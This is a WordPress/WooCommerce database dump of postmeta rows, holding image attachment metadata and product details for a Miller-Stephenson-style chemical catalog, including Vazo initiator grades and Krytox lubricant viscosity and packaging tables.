INSERT INTO `wp_postmeta` VALUES (3646, 523, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3648;s:6:"height";i:2736;s:4:"file";s:31:"2016/08/ReleaSys-Boat-hulls.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"ReleaSys-Boat-hulls-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"ReleaSys-Boat-hulls-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3647, 474, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3648, 467, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3649, 468, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3650, 473, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3659, 544, '_wp_attached_file', '2016/08/chemoursblackwhite-e1471566973700.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3660, 544, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:386;s:6:"height";i:124;s:4:"file";s:45:"2016/08/chemoursblackwhite-e1471566973700.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"chemoursblackwhite-e1471566973700-340x124.jpg";s:5:"width";i:340;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"chemoursblackwhite-e1471566973700-250x124.jpg";s:5:"width";i:250;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"chemoursblackwhite-e1471566973700-200x124.jpg";s:5:"width";i:200;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"chemoursblackwhite-e1471566973700-225x124.jpg";s:5:"width";i:225;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3661, 544, '_wp_attachment_backup_sizes', 'a:4:{s:9:"full-orig";a:3:{s:5:"width";i:386;s:6:"height";i:124;s:4:"file";s:22:"chemoursblackwhite.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:30:"chemoursblackwhite-340x124.jpg";s:5:"width";i:340;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:30:"chemoursblackwhite-180x124.jpg";s:5:"width";i:180;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:30:"chemoursblackwhite-300x124.jpg";s:5:"width";i:300;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3662, 546, '_wp_attached_file', '2016/08/chemoursblackwhite-1-e1471567066522.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3663, 546, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:386;s:6:"height";i:124;s:4:"file";s:47:"2016/08/chemoursblackwhite-1-e1471567066522.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:47:"chemoursblackwhite-1-e1471567066522-340x124.jpg";s:5:"width";i:340;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:47:"chemoursblackwhite-1-e1471567066522-250x124.jpg";s:5:"width";i:250;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:47:"chemoursblackwhite-1-e1471567066522-200x124.jpg";s:5:"width";i:200;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:47:"chemoursblackwhite-1-e1471567066522-225x124.jpg";s:5:"width";i:225;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3664, 546, '_wp_attachment_backup_sizes', 'a:4:{s:9:"full-orig";a:3:{s:5:"width";i:386;s:6:"height";i:124;s:4:"file";s:24:"chemoursblackwhite-1.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:32:"chemoursblackwhite-1-340x124.jpg";s:5:"width";i:340;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:32:"chemoursblackwhite-1-180x124.jpg";s:5:"width";i:180;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:32:"chemoursblackwhite-1-300x124.jpg";s:5:"width";i:300;s:6:"height";i:124;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3665, 549, '_wp_attached_file', '2016/08/KRYTOX_AUTHORIZED-e1471567810981.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3666, 549, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:288;s:6:"height";i:117;s:4:"file";s:44:"2016/08/KRYTOX_AUTHORIZED-e1471567810981.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"KRYTOX_AUTHORIZED-e1471567810981-250x117.jpg";s:5:"width";i:250;s:6:"height";i:117;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"KRYTOX_AUTHORIZED-e1471567810981-200x117.jpg";s:5:"width";i:200;s:6:"height";i:117;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"KRYTOX_AUTHORIZED-e1471567810981-225x117.jpg";s:5:"width";i:225;s:6:"height";i:117;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3667, 549, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:288;s:6:"height";i:117;s:4:"file";s:21:"KRYTOX_AUTHORIZED.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3675, 90, '_edit_lock', '1471570142:1'); 
INSERT INTO `wp_postmeta` VALUES (3676, 452, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3679, 554, '_wp_attached_file', '2016/08/krytoxauth2-e1471571625394.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3680, 554, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:305;s:6:"height";i:133;s:4:"file";s:38:"2016/08/krytoxauth2-e1471571625394.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"krytoxauth2-e1471571625394-250x133.jpg";s:5:"width";i:250;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"krytoxauth2-e1471571625394-200x133.jpg";s:5:"width";i:200;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"krytoxauth2-e1471571625394-225x133.jpg";s:5:"width";i:225;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3681, 554, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:305;s:6:"height";i:133;s:4:"file";s:15:"krytoxauth2.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3682, 555, '_wp_attached_file', '2016/08/krytox_red-e1471571922467.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3683, 555, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:320;s:6:"height";i:135;s:4:"file";s:37:"2016/08/krytox_red-e1471571922467.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"krytox_red-e1471571922467-250x135.jpg";s:5:"width";i:250;s:6:"height";i:135;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"krytox_red-e1471571922467-200x135.jpg";s:5:"width";i:200;s:6:"height";i:135;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"krytox_red-e1471571922467-225x135.jpg";s:5:"width";i:225;s:6:"height";i:135;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3684, 555, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:320;s:6:"height";i:135;s:4:"file";s:14:"krytox_red.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3686, 563, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (3687, 563, '_condition', 'post-116'); 
INSERT INTO `wp_postmeta` VALUES (3688, 563, '_sidebar_to_replace', 'sidebar-main'); 
INSERT INTO `wp_postmeta` VALUES (3689, 563, '_edit_lock', '1471607420:1'); 
INSERT INTO `wp_postmeta` VALUES (3690, 564, '_edit_lock', '1496663626:1'); 
INSERT INTO `wp_postmeta` VALUES (3691, 564, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (3692, 564, '_condition', 'post-116'); 
INSERT INTO `wp_postmeta` VALUES (3693, 564, '_sidebar_to_replace', 'product-sidebar'); 
INSERT INTO `wp_postmeta` VALUES (3694, 565, '_wp_attached_file', '2016/08/vazo2-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3695, 565, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:250;s:4:"file";s:19:"2016/08/vazo2-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"vazo2-2-340x250.jpg";s:5:"width";i:340;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"vazo2-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"vazo2-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"vazo2-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3696, 566, '_wp_attached_file', '2016/08/vazo2-3-e1471611196652.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3697, 566, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:250;s:4:"file";s:34:"2016/08/vazo2-3-e1471611196652.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"vazo2-3-e1471611196652-340x250.jpg";s:5:"width";i:340;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"vazo2-3-e1471611196652-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"vazo2-3-e1471611196652-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"vazo2-3-e1471611196652-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3698, 566, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:450;s:6:"height";i:250;s:4:"file";s:11:"vazo2-3.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:19:"vazo2-3-340x250.jpg";s:5:"width";i:340;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:19:"vazo2-3-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:19:"vazo2-3-300x250.jpg";s:5:"width";i:300;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:19:"vazo2-3-400x250.jpg";s:5:"width";i:400;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3702, 568, '_edit_lock', '1498848892:3'); 
INSERT INTO `wp_postmeta` VALUES (3703, 568, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3704, 569, '_wp_attached_file', '2016/08/Vazo-52--e1471612226253.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3705, 569, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:274;s:6:"height";i:116;s:4:"file";s:35:"2016/08/Vazo-52--e1471612226253.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"Vazo-52--e1471612226253-250x116.jpg";s:5:"width";i:250;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"Vazo-52--e1471612226253-200x116.jpg";s:5:"width";i:200;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"Vazo-52--e1471612226253-225x116.jpg";s:5:"width";i:225;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3706, 569, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:116;s:4:"file";s:12:"Vazo-52-.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3708, 568, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3709, 568, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3710, 568, '312_default_editor', 'Miller-Stephenson offers four commercial grades: Vazo 52(G), 64(G), 67(G), and 88(G). The grade number is the Celsius temperature at which the half-life in solution is 10 hours. Vazo 64 has the following physical characteristics:\r\n<ul>\r\n 	<li>Vazo 52: log (t1/2) = 6767 (1/T) - 18.037 (in toluene)</li>\r\n 	<li>Delivered in solid white "noodle" form</li>\r\n 	<li>Soluble in a wide variety of solvents (aromatic hydrocarbons and other functional organic compounds)</li>\r\n 	<li>Slightly soluble in aliphatic hydrocarbons</li>\r\n 	<li>Insoluble in water</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (3711, 568, '317_default_editor', '100g, 10 and 50 lbs fiber drum, 25kg Corrugated carton'); 
INSERT INTO `wp_postmeta` VALUES (3712, 568, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3713, 568, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3714, 568, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3715, 568, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3716, 568, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3717, 568, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3718, 568, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3719, 568, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3720, 568, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3721, 568, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3722, 568, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3723, 568, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3724, 568, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3725, 568, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3726, 568, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3727, 568, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3728, 568, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3729, 568, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3730, 568, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3731, 568, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3732, 568, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3733, 568, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3734, 568, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3735, 568, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (3736, 568, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3737, 568, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3738, 568, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3739, 568, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3740, 568, '_product_image_gallery', '1351'); 
INSERT INTO `wp_postmeta` VALUES (3741, 452, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3742, 452, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3743, 452, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Property</p>\r\n</td>\r\n<td style="text-align: center;" width="89">143AZ</td>\r\n<td style="text-align: center;" width="89">143AA</td>\r\n<td style="text-align: center;" width="89">143AY</td>\r\n<td style="text-align: center;" width="89">143AB</td>\r\n<td style="text-align: center;" width="89">143AC</td>\r\n<td style="text-align: center;" width="89">143AD</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @0°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">228</td>\r\n<td style="text-align: center;" width="89">350</td>\r\n<td style="text-align: center;" width="89">620</td>\r\n<td style="text-align: center;" width="89">1070</td>\r\n<td style="text-align: center;" width="89">3940</td>\r\n<td width="89">\r\n<p style="text-align: center;">7500</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @40°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">22.8</td>\r\n<td style="text-align: center;" width="89">32</td>\r\n<td style="text-align: center;" width="89">50</td>\r\n<td style="text-align: center;" width="89">78</td>\r\n<td style="text-align: center;" width="89">243</td>\r\n<td width="89">\r\n<p style="text-align: center;">450</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @100°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">4.1</td>\r\n<td style="text-align: center;" width="89">5.3</td>\r\n<td style="text-align: center;" width="89">7.4</td>\r\n<td style="text-align: center;" width="89">10.2</td>\r\n<td style="text-align: center;" width="89">25.4</td>\r\n<td width="89">\r\n<p style="text-align: center;">42.4</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Temperature Range °C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">-57-149</td>\r\n<td style="text-align: center;" width="89">-51-177</td>\r\n<td style="text-align: center;" width="89">-46-204</td>\r\n<td style="text-align: center;" width="89">-40-232</td>\r\n<td style="text-align: center;" width="89">-34-288</td>\r\n<td style="text-align: center;" width="89">-29-316</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3744, 452, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3745, 452, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3746, 452, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3747, 452, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3748, 452, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3749, 452, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3750, 452, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3751, 452, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3752, 452, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3753, 452, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3754, 452, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3755, 452, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3756, 452, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3757, 452, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3758, 452, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3759, 452, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3760, 452, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3761, 452, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3762, 452, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3763, 452, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3764, 452, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3765, 452, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3766, 452, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3767, 452, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3768, 452, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3769, 452, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3770, 452, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3771, 452, '_ywtm_priority_tab_description', '1'); 
